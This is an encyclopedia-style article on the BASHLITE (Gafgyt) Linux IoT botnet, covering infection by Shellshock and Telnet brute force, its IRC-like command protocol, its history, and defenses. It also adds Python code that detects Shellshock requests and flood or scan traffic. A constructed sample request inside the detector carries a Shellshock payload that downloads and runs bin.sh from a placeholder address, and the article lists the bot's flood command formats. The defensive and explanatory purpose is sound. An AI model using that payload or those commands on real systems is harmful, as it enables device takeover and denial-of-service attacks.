from Wikipedia
BASHLITE
Malware details
Technical names (vendor detection names)
  As BashLite: none listed
  As Gafgyt:
    • ELF/Gafgyt.[letter]!tr (Fortinet)
    • HEUR:Backdoor.Linux.Gafgyt.[letter] (Kaspersky)
    • DDoS:Linux/Gafgyt.YA!MTB (Microsoft)
    • ELF_GAFGYT.[letter] (Trend Micro)
  As QBot:
    • Trojan-PSW.Win32.Qbot (Kaspersky)
    • Backdoor.Qbot (Malwarebytes)
    • Win32/Qakbot (Microsoft)
    • Bck/QBot (Panda)
    • Mal/Qbot-[letter] (Sophos)
    • W32.Qakbot (Symantec)
    • BKDR_QAKBOT (Trend Micro)
    • TROJ_QAKBOT (Trend Micro)
    • TSPY_QAKBOT (Trend Micro)
    • WORM_QAKBOT (Trend Micro)
    • Backdoor.Qakbot (VirusBuster)
  As PinkSlip:
    • W32/Pinkslipbot (McAfee)
  As Torlus: none listed
  Caveat: the Win32/W32 QBot, Qakbot and Pinkslipbot names above are vendor labels for the Windows banking trojan QakBot, a separate malware family. "Qbot" is a naming collision with one of BASHLITE's aliases, so those Windows signatures do not detect the Linux bot; the ELF/Linux Gafgyt names are the ones that do.
Aliases: Gafgyt, Lizkebab, PinkSlip, Qbot, Torlus, LizardStresser
Type: Botnet
Author: Lizard Squad
Technical details
Platform: Linux
Written in: C

BASHLITE (also known as Gafgyt, Lizkebab, PinkSlip, Qbot, Torlus and LizardStresser) is malware that infects Linux systems in order to launch distributed denial-of-service (DDoS) attacks.[1] Originally it was also known under the name Bashdoor,[2] but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.[3]

The original version in 2014 exploited a flaw in the bash shell, the Shellshock software bug, to compromise devices running BusyBox.[4][5][6][7] A few months later a variant was detected that could also infect other vulnerable devices on the local network.[8] In 2015 its source code was leaked, causing a proliferation of variants,[9] and by 2016 it was reported that one million devices had been infected.[10][11][12][13]

Of the identifiable devices participating in these botnets in August 2016 almost 96 percent were IoT devices (of which 95 percent were cameras and DVRs), roughly 4 percent were home routers - and less than 1 percent were compromised Linux servers.[9]

Design

BASHLITE is written in C, and designed to easily cross-compile to various computer architectures.[9]

Exact capabilities differ between variants, but the most common feature set[9] is a small menu of DDoS attack types: holding TCP connections open, sending random junk bytes to a TCP or UDP port, and repeatedly sending TCP packets with specified flags (for example SYN). Many variants also include a mechanism to run arbitrary shell commands on the infected machine. There are no facilities for reflected or amplification attacks, so attack volume comes purely from the number of bots and their uplink bandwidth.

BASHLITE uses a client–server model for command and control. The protocol is essentially a lightweight, plaintext imitation of Internet Relay Chat (IRC).[14] Although the code supports multiple command and control servers, most variants ship with a single command and control IP address hardcoded in the binary, which makes that address both a convenient indicator of compromise and a single point of failure for the botnet.

It propagates by brute force, using a built-in dictionary of common usernames and passwords: the bot connects to random IP addresses, attempts to log in (over Telnet), and reports successful logins back to the command and control server.

from Grokipedia
BASHLITE is a malware family targeting Linux-based systems, particularly Internet of Things (IoT) devices such as digital video recorders (DVRs), IP cameras, and routers, to form botnets that conduct distributed denial-of-service (DDoS) attacks. First identified in September 2014, it exploits vulnerabilities such as the ShellShock flaw in the Bash command shell, as well as weak default credentials on Telnet and web interfaces, to propagate and infect devices. The malware, also known by aliases including Gafgyt, Qbot, Lizkebab, and Torlus, originated as an IRC-based botnet before evolving to target IoT ecosystems, infecting over one million devices by mid-2016 and establishing command-and-control (C2) servers managing up to 120,000 bots each.

Its capabilities include executing high-volume DDoS floods via protocols such as TCP SYN, UDP, ICMP, and GRE, with attack potentials reaching up to 400 Gbps; it also daemonizes its process, kills rival malware such as Mirai variants, and has been adapted to target cloud environments and GPU resources for cryptomining in recent iterations. Primarily affecting DVRs and cameras (accounting for 95% of infections), it has also hit routers from vendors including DrayTek, exploiting remote code execution flaws in these devices.

BASHLITE's source code leaked in early 2015, spawning over 12 variants and serving as a precursor to the more sophisticated Mirai, which amplified its influence on global cybersecurity by enabling massive DDoS incidents, including a record 620 Gbps attack on the security researcher Brian Krebs in 2016. Ongoing campaigns, such as those in 2019 targeting over 32,000 vulnerable routers worldwide and 2024 exploits of misconfigured Docker APIs and weak SSH passwords, underscore its persistence and adaptation to modern infrastructures such as cloud-native setups; variants remain active as of 2025.

Overview

Discovery and Initial Naming

BASHLITE was first detected in September 2014 by security researchers shortly after the disclosure of the ShellShock vulnerability (CVE-2014-6271), a critical flaw in the Bash shell that allowed remote code execution on affected systems. The malware emerged amid widespread exploitation attempts targeting vulnerable servers and embedded devices, with early detections tied to scans leveraging the newly revealed Bash weakness. Trend Micro researchers coined the name BASHLITE to reflect the malware's reliance on the Bash shell for initial access and execution, releasing a dedicated scanner tool just days after ShellShock's public disclosure on September 24, 2014. This naming highlighted its Linux-specific nature and distinguished it from prior threats. Subsequent analyses confirmed its focus on commandeering Linux-based IoT devices for coordinated attacks.

As awareness grew, other security firms adopted alternative designations based on observed samples and behaviors, including Gafgyt, Lizkebab, Torlus, and Qbot. Early vendor reports linked BASHLITE to a surge in Linux infections, particularly on unsecured embedded systems, setting the stage for its role in broader DDoS botnet ecosystems.

Core Purpose and Operations

BASHLITE is a malware family designed to infect Linux-based systems and Internet of Things (IoT) devices and enlist them in a botnet for distributed denial-of-service (DDoS) attacks. Its core objective is to overwhelm targeted servers, websites, or networks with traffic until they are unreachable for legitimate users. By exploiting vulnerabilities and weak credentials, BASHLITE turns everyday connected devices, such as routers, cameras, and digital video recorders, into unwitting participants in these attacks.

The operational workflow begins with compromising vulnerable devices, often by scanning for open Telnet or SSH ports and attempting logins with default or common credentials. Once a device is infected, the bot connects to a command-and-control (C2) server and waits for instructions from the operator. On command, infected devices execute coordinated flood-based DDoS attacks, such as TCP or UDP floods, directing traffic at specified IP addresses or domains to exhaust the target's resources. This lets the botnet scale attacks rapidly by pooling the bandwidth of many compromised systems.

BASHLITE demonstrated significant scale from its emergence. By mid-2016, researchers identified over 1 million devices under its control across multiple C2 servers, highlighting its ability to amass large bot armies, primarily from IoT ecosystems. This growth reflected the malware's reliance on the expanding population of unsecured connected devices.

Technical Architecture

Infection Vectors

BASHLITE's original infection vector exploits the Shellshock vulnerability (CVE-2014-6271) in the GNU Bash shell, targeting Linux-based systems through HTTP requests to vulnerable web servers or CGI scripts that invoke Bash. The flaw lets an attacker execute arbitrary commands remotely, typically to download and run a dropper script (e.g., bin.sh) that installs the bot on unpatched embedded devices, including the BusyBox-based systems common in IoT hardware.

In addition to Shellshock, BASHLITE spreads by scanning for open Telnet (ports 23 and 2323) and SSH ports on internet-connected devices and attempting logins from a hardcoded list of weak or default credentials such as "admin," "root," or "123456." This brute-force approach exploits factory-default settings on IoT devices such as routers, DVRs, and IP cameras from manufacturers including Dahua, which often ship with remote access enabled and passwords unchanged. The malware focuses on Linux-based embedded systems and unpatched servers, prioritizing those exposed to the internet through Shodan-like scans for vulnerable ports and services, which enables rapid propagation across populations of IoT devices with minimal security configuration.
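
The Shellshock delivery described above is easy to spot on the wire, because the trigger is a fixed string at the start of a header value. The following detector is an added example written for this page, not code from BASHLITE or from any vendor tool. It parses raw HTTP requests, checks every header (CGI servers export all request headers as HTTP_* environment variables, so User-Agent is only the most common carrier), and extracts the command Bash would have run after the empty function body. The requests are constructed samples: the addresses are RFC 5737 documentation ranges and the download URL is hypothetical; only the dropper name bin.sh comes from the page.

```python
"""Detecting Shellshock (CVE-2014-6271) delivery in HTTP requests.

Added example, not code from the page or from any vendor tool. A vulnerable
Bash, handed a value beginning with "() {" as an environment variable by a
CGI server, executes whatever follows the closing "};". The requests below
are constructed (RFC 5737 addresses, hypothetical URL)."""
import re

# Matches "() {" at the start of a value, tolerating the whitespace variations
# seen in real scanners, e.g. "() { :;};" and "() {:; };".
SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\)\s*\{")


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (request line, {lower-case header: value})."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:            # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def detect_shellshock(raw: str):
    """Return [(header, injected_command)] for every header carrying the trigger.

    Every header is checked, not just User-Agent, because CGI servers export
    all request headers as HTTP_* environment variables."""
    _, headers = parse_request(raw)
    findings = []
    for name, value in headers.items():
        if SHELLSHOCK_PREFIX.match(value):
            # Bash ran whatever followed the function body's closing "};".
            _, _, command = value.partition("};")
            findings.append((name, command.strip()))
    return findings


def triage(requests):
    """Count clean vs. malicious requests in a batch, returning (clean, hits).
    hits is a list of (index, findings) for requests that carried a payload."""
    hits = [(i, f) for i, r in enumerate(requests) if (f := detect_shellshock(r))]
    return len(requests) - len(hits), hits


# Constructed samples, not captured traffic.
BENIGN = (
    "GET /cgi-bin/status.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    "\r\n"
)
# Dropper-style payload: fetch and run a shell script named bin.sh (the name
# is from this page; the URL and path are hypothetical).
MALICIOUS = (
    "GET /cgi-bin/status.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "User-Agent: () { :; }; /bin/bash -c 'wget http://192.0.2.10/bin.sh -O /tmp/bin.sh; sh /tmp/bin.sh'\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for i, f in triage([BENIGN, MALICIOUS])[1]:
        print(f"request {i}: Shellshock via {f[0][0]!r} -> {f[0][1]}")
```

On a host you control, the standard local check for the underlying bug is `env x='() { :;}; echo vulnerable' bash -c "echo test"`: an unpatched Bash prints "vulnerable" before "test", a patched one prints only "test". Note that the detector keys on the function-definition prefix, not on any particular download command, so it also catches reconnaissance probes that carry only `id` or `echo` after the prefix.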

Structure

BASHLITE uses a centralized command-and-control (C2) architecture: dedicated servers manage communication with infected IoT devices over a custom protocol modeled on Internet Relay Chat (IRC). The malware embeds the C2 servers' IP addresses directly in its binary, so bots connect immediately after infection without relying on DNS resolution. These servers, frequently hosted on ordinary hosting providers or content delivery networks, let operators broadcast directives to thousands of compromised devices simultaneously; one analysis identified 486 unique C2 IPs distributed across 93 autonomous systems in 32 countries.

The protocol runs over unencrypted TCP connections in plaintext, emulating IRC while staying lightweight enough for resource-constrained IoT hardware. Bots initiate sessions with C2 servers, typically on IRC's standard port 6667, while propagation traffic is mostly Telnet on port 23. Commands are simple strings prefixed by an exclamation mark, such as !* TCPFLOOD <target IP> <port> <duration> <threads> <flags>, which instruct bots to execute a specific action; observed commands fall into categories such as attacks (66.4% of traffic), management (18.4%), and interrupts (13.1%), with keep-alive PING/PONG messages exchanged every 60 seconds to sustain connections. Because the channel is plaintext, a packet capture of a bot's session reveals targets, durations, and operator activity directly.

For sustained operation and botnet growth, BASHLITE integrates self-propagation routines that continuously scan for new victims using brute-force credential attacks on Telnet and SSH services. Successful infections are reported back to the C2 server over the same IRC-like channel, enabling automated expansion without manual intervention; this mechanism, activated by commands such as "!SCANNER ON", keeps the botnet resilient and growing post-infection.

DDoS Attack Methods

BASHLITE employs a range of volumetric DDoS techniques to flood targets with excessive traffic, relying on the compromised IoT devices' ability to send high volumes of packets. The core attack methods include TCP SYN floods, which initiate numerous incomplete TCP handshakes to exhaust server resources by filling connection queues with half-open connections; UDP floods, which bombard targets with unsolicited UDP packets to saturate bandwidth; ICMP floods, which send excessive Internet Control Message Protocol (ICMP) echo requests (pings) to overwhelm network resources; GRE floods, which wrap junk in Generic Routing Encapsulation (GRE) packets to generate high-volume traffic; and HTTP GET/POST floods, which overwhelm web servers by simulating excessive legitimate requests at the application layer. These methods target common ports such as 80 (HTTP), 443 (HTTPS), and 53 (DNS), prioritizing simplicity and effectiveness over sophisticated evasion.

The botnet's command-and-control (C2) infrastructure directs these attacks through straightforward command strings issued to infected bots, typically formatted as "<command> <target IP> <port> <duration> [optional parameters]". For instance, a TCP SYN flood might use "tcpflood <target IP> <port> <duration> syn", where the "syn" flag selects the SYN-based variant and instructs bots to generate spoofed SYN packets for the specified number of seconds. Similarly, UDP floods can be commanded as "udpflood <target IP> <port> <duration>", sending raw UDP datagrams without establishing connections, while ICMP floods use an "icmpflood" command and GRE floods a "gre" command with the same target and duration parameters. HTTP floods follow an analogous pattern, denoted by a command such as "httpflood" that repeatedly requests resources. This uniform command structure enables rapid deployment across the botnet.

Infected IoT devices, often left always-on and undersecured, serve as persistent traffic generators, enabling sustained assaults that scale with botnet size. Historical incidents demonstrate BASHLITE's capacity for attacks reaching up to 400 Gbps, achieved by coordinating thousands of low-bandwidth devices into a unified botnet rather than by amplification. Attack duration is set per command, typically in minutes to hours.

Historical Development

Emergence in 2014

BASHLITE emerged in 2014, coinciding with the rapid expansion of Internet of Things (IoT) adoption, as the global installed base of connected devices surpassed 16 billion units that year. Its appearance followed closely after the public disclosure of the Shellshock vulnerability (CVE-2014-6271) on September 24, 2014, which exposed a flaw in the Bash shell commonly used in Linux-based systems. First identified that September, BASHLITE targeted the growing population of unsecured IoT hardware, an early exploitation of the weaknesses inherent in that emerging technology landscape.

The malware was likely developed by anonymous cybercriminals linked to the Lizard Squad hacking group, who operated without confirmed state sponsorship and focused on profit-driven operations. Initially known under aliases such as Lizard Stresser, it powered a commercial DDoS-for-hire service launched in late 2014, allowing customers to rent botnet capacity for targeted disruptions. This model reflected the motivations of opportunistic actors seeking to monetize compromised devices in an underground DDoS market with a low barrier to entry.

BASHLITE spread rapidly by compromising unpatched servers and early IoT devices, including home routers, through weak default credentials and exploits such as Shellshock in BusyBox environments. Infections proliferated across vulnerable embedded systems within months, prompting initial responses from security researchers, who collaborated with ISPs on the first takedowns in 2015.

Key Variants and Evolutions

One of the earliest significant variants of BASHLITE emerged in 2015 following the leak of its source code, which spurred the development of over 12 iterations, including those tracked as Gafgyt. Another early evolution was Lizkebab. A pivotal development came in 2016 with the emergence of Mirai, a successor that borrowed from BASHLITE's design to achieve faster propagation across IoT networks. Mirai integrated self-contained scanning directly into the binary, eliminating the need for external tools and enabling rapid credential brute-forcing on a larger scale, in contrast with BASHLITE's more modular approach. This let Mirai amass botnets significantly larger than its predecessor, using similar weak-credential exploits but with added resilience through DNS-based command-and-control resolution, where BASHLITE variants typically hardcode a single C2 IP address.

By 2019, BASHLITE itself saw direct updates that expanded its functionality beyond DDoS, incorporating cryptocurrency mining modules and persistent backdoor commands for remote access. These enhancements targeted devices such as WeMo smart plugs, allowing operators to download and execute mining payloads alongside traditional attack commands and so diversify revenue streams.

In 2024, variants under the Gafgyt lineage shifted focus toward cloud environments, exploiting weak SSH passwords on misconfigured servers, including those in AWS ecosystems, to deploy payloads from memory without disk writes. These updates emphasized GPU-accelerated cryptocurrency mining, prioritizing high-compute cloud instances such as EC2 over IoT DDoS recruitment. Gafgyt variants also exploited CVE-2023-1389, a command injection vulnerability in TP-Link Archer AX21 routers, to propagate, as did related botnets such as Moobot. Later in 2024, Gafgyt campaigns targeted publicly exposed, misconfigured Docker remote API servers to deploy the malware via container creation.

Impact and Incidents

Targeted Devices and Scale

BASHLITE primarily targets Internet of Things (IoT) devices running Linux-based operating systems, particularly on MIPS and ARM architectures, which are common in embedded systems because of their efficiency and widespread use in IoT hardware. Key examples include wireless routers, IP cameras, digital video recorders (DVRs), and smart plugs such as WeMo devices, as well as servers with weak credentials. These devices are often compromised through default credentials or unpatched vulnerabilities, allowing the malware to propagate and form botnets capable of coordinated distributed denial-of-service (DDoS) attacks. Industrial embedded systems, such as those in manufacturing equipment, are as susceptible as consumer gadgets, giving the malware broad reach across both sectors.

The scale of BASHLITE infections has grown significantly, with botnets peaking at over 1 million devices by mid-2016, predominantly DVRs and cameras that fueled large-scale DDoS operations. This expansion was driven by the malware's ability to exploit the rapid proliferation of insecure IoT hardware; honeypot analyses have recorded over 342 million commands from more than 2.3 million unique IP addresses. As of 2024, ongoing variants continue to infect millions of vulnerable IoT devices globally, sustained by persistent flaws in device firmware and supply chain weaknesses. Some evolutions of BASHLITE have also extended to cloud-native environments, broadening the potential infection vectors.

Notable DDoS Events

In 2015 and 2016, variants of BASHLITE, notably LizardStresser, were deployed by the Lizard Squad hacking group to execute DDoS attacks against gaming networks and internet service providers (ISPs). These incidents targeted platforms such as Xbox Live and Daybreak Games, disrupting online multiplayer services for millions of users during holiday periods. One prominent attack in June 2016 peaked at 400 Gbps, using compromised IoT devices such as webcams and routers to overwhelm targets without amplification, highlighting the growing scale of IoT-driven threats. The attacks prompted enhanced mitigation by affected providers, including traffic filtering and collaboration with cybersecurity firms to dismantle related infrastructure.

A significant overlap with BASHLITE occurred in the October 2016 DDoS assault on Dyn, a major DNS provider, which reportedly peaked at 1.2 Tbps and caused extensive internet outages across the United States and Europe. This event, primarily powered by the Mirai botnet, disrupted access to many high-profile sites for several hours. Mirai's codebase drew directly on BASHLITE, reusing similar infection mechanisms and DDoS payloads while expanding the scanning of vulnerable IoT devices. The attack's consequences included economic losses estimated in the millions and accelerated global awareness of IoT security risks, spurring regulatory discussions on device standards.

In 2024, updated variants of BASHLITE, such as Gafgyt, shifted focus toward cloud-native environments, exploiting weak SSH passwords to infect servers and enable DDoS campaigns against hosted services. These attacks disrupted operations on platforms similar to AWS by commandeering GPU resources for both cryptocurrency mining and flooding, demonstrating the malware's adaptability to hybrid cloud-IoT ecosystems. In 2025, Gafgyt continued to evolve, with campaigns targeting misconfigured Docker remote API servers to deploy the malware and build botnets for DDoS attacks, alongside surges in IoT device exploitation contributing to large-scale disruptions. Active indicators of compromise were still being reported as of 2025.

Mitigation Strategies

Exploited Vulnerabilities

BASHLITE primarily exploited the ShellShock vulnerability, CVE-2014-6271, which carries a CVSS base score of 10.0 and enables remote code execution because GNU Bash (versions through 4.3) kept parsing and executing the trailing string after a function definition passed in an environment variable. This flaw allowed attackers to inject and execute arbitrary commands on vulnerable Linux-based systems, particularly those running BusyBox, facilitating the initial infection of IoT devices shortly after the vulnerability's disclosure in September 2014.

In addition to ShellShock, BASHLITE targeted devices with weak authentication on Telnet and SSH services, commonly exploiting default or unchanged administrative credentials; this vector needs no CVE, only the widespread misconfiguration of IoT deployments.

Later variants, such as Gafgyt, expanded to exploit CVE-2017-18368, a command injection vulnerability in Zyxel P-660HN-T1A routers running firmware versions prior to 3.40(ULM.0)b31, allowing remote attackers to execute arbitrary code via crafted HTTP requests to the web management interface. More recent Gafgyt strains incorporate exploits for CVE-2023-1389, a command injection flaw in TP-Link Archer AX21 routers with firmware before 1.1.4 Build 20230219, where improper handling of the "country" parameter in the web interface permits unauthenticated remote code execution. These variants show a consistent pattern of targeting injection points in router firmware to propagate across networks.

As of 2025, BASHLITE and its derivatives persist in exploiting unpatched vulnerabilities in IoT devices, reliance on factory-default credentials, and openly accessible services such as Telnet, which remain prevalent because of delayed updates in resource-constrained environments. This underscores the malware's adaptability to common security oversights rather than reliance on zero-day flaws, enabling sustained infections in embedded systems.

Detection and Prevention Techniques

Detection of BASHLITE infections relies primarily on network-based monitoring that identifies the malware's characteristic communication patterns and the anomalous traffic generated by compromised IoT devices. Tools such as Snort and Wireshark enable analysis of packet captures (PCAPs) to detect the IRC-like command-and-control (C2) traffic, which BASHLITE commonly uses on TCP port 6667 for coordination. Custom Snort signatures can target the IRC-like protocol, brute-force attempts on Telnet/SSH ports (23/TCP and 22/TCP), and the file downloads associated with propagation; published evaluations report detection accuracies up to 99.95% on IoT datasets such as IoT-23. Wireshark likewise supports manual inspection of outbound DDoS packets, revealing UDP/TCP flooding patterns that deviate from normal device behavior, such as high-volume traffic to a single target or connections to many random IP addresses.

Anomaly detection complements signature-based methods by flagging deviations in network flows, including sudden spikes in egress traffic or connections to known malicious C2 servers. Intrusion detection systems such as Suricata, which supports multi-threading for efficient processing of IoT traffic, can alert on these anomalies; one evaluation reports processing times as low as 112 seconds on the Bot-IoT dataset with CPU usage under 15% at high packet rates. For instance, Suricata rulesets can watch for propagation routines attempting dictionary attacks on weak credentials, a core infection vector for BASHLITE.

Prevention strategies emphasize securing IoT devices against BASHLITE's exploitation of default configurations and unpatched vulnerabilities. Regularly applying firmware updates and security patches closes known flaws, such as those in BusyBox or the shell interpreter, that BASHLITE reaches over Telnet or SSH. Disabling unnecessary remote access services such as Telnet (port 23/TCP) and SSH, or restricting them to specific users and source networks, prevents initial infections through brute-force attacks; blocking non-essential ports such as 48101/TCP further limits exposure. Enforcing strong, unique password policies replaces the default credentials that BASHLITE scanners exploit extensively. Network segmentation with firewalls isolates IoT devices into separate VLANs or subnets, preventing lateral movement if one device is compromised and containing DDoS traffic to the affected segment. Firewalls should block inbound connections to vulnerable ports and outbound connections to suspicious destinations, with next-generation firewalls dynamically adjusting segments based on device profiles. Intrusion prevention systems (IPS) such as Suricata in inline mode can be integrated into these setups to drop malicious packets in real time.

Advanced measures add behavioral analysis to catch propagation and C2 activity that static signatures miss. Endpoint detection and response (EDR) tools can monitor for anomalous script execution on supported IoT gateways or edge devices, identifying BASHLITE's shell scripts that attempt binary downloads through runtime behavior profiling. This approach flags deviations such as delayed process launches or memory-resident payloads, which some BASHLITE variants use to evade traditional antivirus. For botnet disruption, sinkholing redirects traffic from identified C2 servers to controlled sinks, isolating infected devices and preventing command receipt; this has been effective against IRC-based botnets by hijacking DNS resolution for known malicious hosts, whereas variants with a hardcoded C2 IP address must instead be cut off by blocking or null-routing that address.

Recent Gafgyt variants (as of November 2025) have expanded to cloud environments, exploiting misconfigured Docker remote APIs and weak SSH passwords. To mitigate these, keep the Docker daemon bound to its local Unix socket rather than a public TCP port, or, where remote access is required, enable TLS with client certificate verification; for SSH, enforce key-based authentication and disable password logins.
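
The two behaviours the section says anomaly detection should catch, a bot brute-forcing random addresses on Telnet/SSH and a bot executing a flood command, both show up in flow data without any payload inspection. The block below is an added example written for this page, not code from any IDS product. It runs over simplified flow records of the kind a NetFlow/IPFIX exporter or Zeek conn.log would provide, flagging sources that contact many distinct hosts on ports 22/23/2323 (propagation) and source/destination pairs whose packet rate in a time window exceeds a threshold (a flood). The thresholds and the flow records are assumptions constructed for the example, using RFC 1918 and RFC 5737 addresses.

```python
"""Flow-based detection of BASHLITE propagation and flood behaviour.

Added example, not from the page or any vendor product. Works over
simplified flow records (one dict per flow: src, dst, dport, packets, ts in
seconds). Thresholds are assumptions to tune per network; all records below
are constructed, not real traffic."""
from collections import defaultdict

BRUTE_FORCE_PORTS = {22, 23, 2323}   # SSH, Telnet, alternate Telnet


def detect_scanners(flows, min_distinct_dsts=20):
    """Flag sources that open connections to many distinct hosts on Telnet/SSH
    ports. A bot brute-forcing random IPs looks like this; a camera or DVR
    almost never initiates Telnet to anything."""
    dsts = defaultdict(set)
    for f in flows:
        if f["dport"] in BRUTE_FORCE_PORTS:
            dsts[f["src"]].add(f["dst"])
    return {src: len(d) for src, d in dsts.items() if len(d) >= min_distinct_dsts}


def detect_floods(flows, window_s=10, pps_threshold=1000):
    """Flag (src, dst) pairs whose packet rate in any window exceeds the
    threshold: the egress signature of a flood command. Returns the peak
    packets-per-second observed for each flagged pair."""
    packets = defaultdict(int)
    for f in flows:
        packets[(f["src"], f["dst"], f["ts"] // window_s)] += f["packets"]
    alerts = {}
    for (src, dst, _), n in packets.items():
        pps = n / window_s
        if pps >= pps_threshold:
            alerts[(src, dst)] = max(alerts.get((src, dst), 0), pps)
    return alerts


def build_sample_flows():
    """Constructed flows: one infected camera, one normal admin host."""
    flows = []
    # Infected camera (10.0.0.5) probing 25 distinct hosts on Telnet.
    for i in range(1, 26):
        flows.append({"src": "10.0.0.5", "dst": f"198.51.100.{i}",
                      "dport": 23, "packets": 6, "ts": i})
    # The same bot later running a flood: 1500 packets/s at one target for 10 s.
    for t in range(10):
        flows.append({"src": "10.0.0.5", "dst": "203.0.113.5",
                      "dport": 80, "packets": 1500, "ts": 100 + t})
    # Normal admin host (10.0.0.7): three SSH sessions to internal servers.
    for i in range(3):
        flows.append({"src": "10.0.0.7", "dst": f"10.0.1.{i}",
                      "dport": 22, "packets": 400, "ts": 50 + i})
    return flows


if __name__ == "__main__":
    sample = build_sample_flows()
    print("scanners:", detect_scanners(sample))
    print("floods:", detect_floods(sample))
```

Both checks are per-source and need no signature, so they still fire when a variant changes its command vocabulary or C2 port; the price is tuning, since a legitimate jump host or a busy NAT gateway will cross naive thresholds, which is why the functions take them as parameters rather than hardcoding them.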
